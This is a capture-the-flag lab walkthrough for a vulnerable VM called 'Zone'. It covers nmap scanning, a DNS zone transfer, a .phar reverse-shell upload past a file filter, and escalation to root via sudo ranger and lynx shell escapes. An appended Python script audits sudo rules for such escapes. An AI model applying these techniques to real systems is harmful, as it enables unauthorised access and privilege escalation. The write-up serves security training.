# Lab Setup

Download: Zone

NAT, IP: 192.168.1.140

# Penetration Process

# Initial Information Gathering

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA)
|   256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA)
|_  256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| dns-nsid: 
|_  bind.version: not currently available
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    currently available
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
```

```
User-agent: *
Allow: /

Sitemap: http://securezone.nyx/sitemap.xml
```

That returns a 404. No matter, let's look at the DNS service.

```
┌──(root㉿kali)-[~]
└─# dig axfr securezone.nyx @192.168.1.140
; <<>> DiG 9.19.21-1-Debian <<>> axfr securezone.nyx @192.168.1.140
;; global options: +cmd
securezone.nyx.         604800  IN      SOA     ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
securezone.nyx.         604800  IN      NS      ns1.securezone.nyx.
admin.securezone.nyx.   604800  IN      A       127.0.0.1
ns1.securezone.nyx.     604800  IN      A       127.0.0.1
upl0ads.securezone.nyx. 604800  IN      A       127.0.0.1
www.securezone.nyx.     604800  IN      A       127.0.0.1
securezone.nyx.         604800  IN      SOA     ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.140#53(192.168.1.140) (TCP)
;; WHEN: Thu May 23 00:27:02 EDT 2024
;; XFR size: 7 records (messages 1, bytes 248)
```

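The zone transfer gives us several hostnames, so let's get to work.

upl0ads.securezone.nyx has something: it is an upload point, with filtering.

It is a PHP site, so load a wordlist and enumerate the file types that can be uploaded; this shows that .phar can be uploaded.

Enumerating directories turns up the uploads directory; requesting the uploaded file gives a reverse shell: http://upl0ads.securezone.nyx/uploads/shell.phar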

# Privilege Escalation

```
sudo -u hans /usr/bin/ranger /home/hans/.ssh/
```

This may throw an error when run; export TERM first to define a terminal type.

Find id_rsa.

Clean it up:

```
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
```

SSH in to get a shell as hans.

Then sudo -l shows that lynx can be run with sudo.

Then ! switches to a root shell, and that's it.
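
As an added example (not part of the original write-up), a defender-side audit for the two sudo rules this section relies on: it parses `sudo -l` output, flags grants of programs that can start a shell from their own interface, and follows those grants from account to account. The sample output, the `www-data` and `zone` names, and the program list are constructed assumptions.

```python
import re

# Assumption: short, non-exhaustive list of interactive programs that can start
# a shell from their own UI; ranger and lynx are the two used on this page.
SHELL_ESCAPE = {"ranger", "lynx", "vi", "vim", "less", "more", "man", "ftp"}

# Constructed `sudo -l` output per account (user and host names are assumed).
SAMPLE = {
    "www-data": "User www-data may run the following commands on zone:\n"
                "    (hans) NOPASSWD: /usr/bin/ranger\n",
    "hans": "User hans may run the following commands on zone:\n"
            "    (root) NOPASSWD: /usr/bin/lynx\n"
            "    (root) /usr/sbin/apache2ctl graceful\n",
}

# "(runas[: group]) [TAG: ...] command[, command...]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^):\s]+)[^)]*\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit(text):
    """Return (runas, command) pairs that hand out a shell-capable program."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m or "NOEXEC:" in m.group("tags"):
            continue  # not a rule line, or NOEXEC stops the program running commands
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE or binary == "ALL":
                findings.append((m.group("runas"), cmd))
    return findings


def escalation_chain(sudo_l, start):
    """Follow risky rules from one account to the next until none remain."""
    chain = [start]
    while chain[-1] in sudo_l:
        hops = [r for r, _ in audit(sudo_l[chain[-1]]) if r not in chain]
        if not hops:
            break
        chain.append(hops[0])
    return chain


if __name__ == "__main__":
    print(" -> ".join(escalation_chain(SAMPLE, "www-data")))
```

Each rule looks minor on its own; the chain shows that together they take the web account to root, which is why such rules should be removed or tagged NOEXEC.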

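# Summary

Lynx is a text-mode web browser: it displays page content as plain text, without graphics or multimedia elements. It is usually used in a terminal, where pages are opened by entering a URL on the command line.

Lynx is an old but powerful tool, especially suited to browsing the Internet from text-based user interfaces such as SSH sessions or terminal windows. It is widely used in server environments, for remote terminal access, and for simple browsing over slow network connections.

Because it shows only text, Lynx may not fully render pages with complex layouts, images or multimedia, but it is a very useful tool when information is needed quickly or browsing has to happen in a resource-constrained environment.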